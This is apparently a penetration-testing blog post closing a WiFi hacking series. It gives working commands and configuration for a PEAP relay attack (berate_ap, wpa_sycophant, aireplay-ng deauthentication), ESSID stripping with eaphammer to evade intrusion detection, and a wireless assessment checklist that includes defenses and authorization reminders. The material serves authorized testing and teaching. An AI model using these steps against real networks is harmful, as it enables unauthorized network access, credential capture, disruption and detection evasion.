WiFi Hacking 101: Wrapping Up the Series (Part 4)

Table of contents

👋 Introduction

Hey everyone!

Last week we covered enterprise WiFi exploitation. The 802.1X architecture. EAP methods and their weaknesses. Credential capture with Evil Twin. Legacy method exploitation (PAP, EAP-MD5). Pass-the-Hash using captured NT hashes directly in wpa_supplicant.

This week we close the series with the two techniques that sit at the top of the enterprise WiFi attack chain: PEAP relay and ESSID stripping. Then a wireless assessment checklist you can use on your next engagement.

Let’s finish strong 👇

⚡ PEAP Relay Attack

PEAP relay was introduced in 2018 by Michael Kruger and Dominic White in their paper “Practical attacks against WPA-EAP-PEAP.” It’s categorically different from what we covered last week.

Credential capture attacks (eaphammer, hostapd-wpe) require the victim to connect to your rogue AP and then you crack the NetNTLMv1 hash offline. PEAP relay skips cracking entirely. You forward the victim’s live authentication exchange to the real network. The RADIUS server authenticates it. You get network access.

No hash. No cracking. No password.

Key constraints:

• Works with PEAP+MSCHAPv2 only. Not TTLS+MSCHAPv2.
• Requires at least 3 wireless adapters.
• Timing matters. Complex setup.

Why This Works

The IEEE 802.1X standard trusts that EAP frames come from legitimate sources. Without cryptographic binding, there’s nothing tying the authentication session to the physical client that started it. You’re just a frame forwarder. The RADIUS server can’t tell.

The relay depends on crypto_binding=0 in the PEAP exchange. Crypto binding (documented in RFC 5281) links the outer TLS tunnel to the inner MSCHAPv2 session. When disabled, you can relay one without the other. Many enterprise networks still accept crypto_binding=0 for backwards compatibility with legacy clients.

Attack Architecture

[Victim] ---> [Rogue AP (berate-ap)] ---> [wpa_sycophant] ---> [Legit AP] ---> [RADIUS]

Three components, three adapters running simultaneously.

berate_ap (SensePost/Orange Cyberdefense) acts as the rogue AP. It intercepts the victim’s EAP frames and passes them to wpa_sycophant.

wpa_sycophant (SensePost) is a patched wpa_supplicant that relays those frames to the legitimate AP. It connects to the real network on behalf of the victim.

DoS adapter forces the victim off the real AP so they reconnect to yours.

wpa_sycophant Configuration

network={
    ssid="CorporateWiFi"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity=""              # Leave blank
    anonymous_identity=""    # Leave blank
    password=""              # Leave blank
    eap=PEAP
    phase1="crypto_binding=0 peapver=0"
    phase2="auth=MSCHAPV2"
    bssid_blacklist=AA:BB:CC:DD:EE:FF  # MAC of your berate-ap interface
}

bssid_blacklist is critical. It prevents wpa_sycophant from connecting to your own rogue AP and creating an infinite loop. Set it to the berate-ap MAC.

If peapver=0 doesn’t work, try peapver=1.

Execution

Interface 1 (managed mode) - Rogue AP:

berate_ap --eap --mana-wpe --wpa-sycophant --no-virt --mana-credout lo wlan0 'CorporateWiFi'

Interface 2 (managed mode) - Relay:

wpa_sycophant -c sycophant.conf -i wlan1

Interface 3 (monitor mode) - Temporary DoS:

iw dev wlan2 set channel 6
timeout 5 aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan2mon

The deauth burst is temporary by design. You only need the victim to look for an AP once. Keep wlan2 available; you may need to repeat the DoS if the victim reconnects to the real AP before wpa_sycophant establishes the relay.

Once wpa_sycophant connects to the real network it should obtain an IP automatically. If not, run dhclient wlan1 manually.

What Stops This

Enforced crypto binding: If the RADIUS server requires crypto_binding=1, the relay fails. The cryptographic binding links the outer TLS tunnel to the inner MSCHAPv2 session. You can’t split them. FreeRADIUS supports this via crypto_binding = require in the PEAP module config, but it’s rarely deployed.

EAP-TLS: Immune entirely. No passwords are transmitted. Mutual certificate-based auth means you’d need the client’s private key to impersonate it.

🎭 ESSID Stripping

Wireless Intrusion Detection Systems (WIDS) flag rogue APs by matching their SSID against a whitelist of known corporate networks. ESSID stripping defeats this by appending a visually invisible character to the SSID, making it a different string while appearing identical to users.

CorporateWiFi and CorporateWiFi (trailing space) are different strings. The WIDS sees no match. No alert fires.

Invisible characters:

• Space: \x20
• Tab: \x09
• Zero-width space: \xE2\x80\x8B (Unicode U+200B)

A side effect: Apple devices normally group APs with the same SSID under a single network entry, which would reveal your Evil Twin as a suspicious duplicate. ESSID stripping makes the stripped SSID appear as a separate network to Apple clients, eliminating that visual tell.

Using eaphammer

eaphammer’s --essid-stripping flag handles this directly:

python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid 'CorporateWiFi' \
  --creds \
  --negotiate balanced \
  --essid-stripping '\x20'

airgeddon applies ESSID stripping automatically during Evil Twin attacks by default, without needing a separate flag.

What It Doesn’t Bypass

Signature-based WIDS: defeated. Behavior-based systems: not affected.

Behavior-based detection monitors for patterns you can’t hide:

• Deauthentication spikes (volume of deauth frames per client or timeframe)
• Certificate anomalies (your cert doesn’t chain to the corporate CA)
• A known BSSID disappearing while a new one appears on the same channel with a nearly identical SSID
• Unusual EAP negotiation patterns

Modern enterprise WIPS platforms combine both detection methods. ESSID stripping buys you cover against the simpler systems. Don’t treat it as a guarantee.

📋 Wireless Assessment Checklist

This is what a complete wireless engagement should cover. Use it as your field guide.

Always confirm scope before starting. Some tests (DoS, network disruption, segmentation, captive portal bypass) require explicit authorization and agreed time windows. Notify stakeholders before running disruptive tests.

Reconnaissance

• Confirm agreed SSIDs in scope
• Identify AP models, firmware versions, and known CVEs
• Check physical access to APs
• Scan all bands: 2.4GHz, 5GHz, and 6GHz
• Identify all SSIDs in scope, including hidden networks
• Detect DFS channel usage
• Check for existing rogue APs in the RF environment
• Check wireless client isolation settings
• Check if passwords are visible in common areas

Open and Personal Networks

• Attempt WEP cracking on any WEP networks found
• Capture WPA/WPA2 4-way handshakes and assess passphrase strength
• Capture PMKIDs (clientless) and assess passphrase strength
• Try Evil Twin + captive portal against WPA/WPA2 PSK networks
• Test WPS Pixie Dust, Null PIN, and brute-force
• Check if WPS PBC is enabled

WPA3 and Transitional Networks

• Identify WPA2/3 mixed-mode (transitional) networks
• Test downgrade attack against transitional networks
• Test Dragon Drain DoS against WPA3 APs
• Perform online dictionary attack against WPA3-SAE
• Verify MFP/PMF enforcement status
• Test DoS resilience on non-MFP networks

Enterprise Networks (MGT / 802.1X)

• Gather EAP identities and extract username formats
• Extract AP certificate details: CN, issuer, SANs, expiration, algorithm
• Enumerate accepted EAP methods (EAP_buster)
• Check if legacy/weak methods are accepted: PAP, CHAP, EAP-MD5
• Try Evil Twin credential capture (eaphammer, hostapd-wpe)
• Capture and crack NetNTLMv1 hashes
• Capture plaintext credentials if TTLS+PAP is accepted
• Attempt PEAP relay (wpa_sycophant + berate_ap, 3 adapters)
• Test Pass-the-Hash authentication with captured NT hashes
• Verify whether clients enforce CA validation against a known CA
• Verify certificate robustness: algorithm strength, key length, chain integrity, expiration

WIDS/WIPS Evaluation

• Identify presence of WIDS/WIPS in the environment
• Test ESSID stripping to evaluate signature-based detection
• Check whether deauth attacks trigger alerts
• Test network segmentation from the wireless segment

🎯 Key Takeaways

PEAP relay changes the calculus on enterprise WiFi. You’re not hoping the password is in your wordlist. You forward the authentication live and walk onto the network. Three adapters, one config file, and a target that accepts crypto_binding=0. The only reliable defenses are enforced crypto binding and EAP-TLS.

ESSID stripping defeats the most common WIDS detection method. One invisible character. That’s the difference between triggering an alert and not. It doesn’t beat behavior-based detection, but it removes the easiest catch.

The checklist is your pre-flight. Each item represents a finding category. Work through it on every engagement. The most consistent enterprise WiFi findings are PEAP without CA validation, legacy EAP methods left enabled, and WPS still active on APs that should have had it disabled years ago.

---

That wraps up the WiFi series.

Four issues. Hardware and fundamentals. WPA/WPA2 cracking, PMKID, WPS, and WPA3. Enterprise credential capture, Pass-the-Hash, and EAP method exploitation. PEAP relay and ESSID stripping.

Build a lab. FreeRADIUS on a Raspberry Pi. Practice until the 802.1X flow makes sense at the frame level. These attacks work because organizations optimize for compatibility. Your job is to find where they made that trade-off.

Thanks for reading, and happy hunting!

— Ruben

Other Issues

WiFi Hacking 101: Exploiting Enterprise Networks (Part 3)

Previous Issue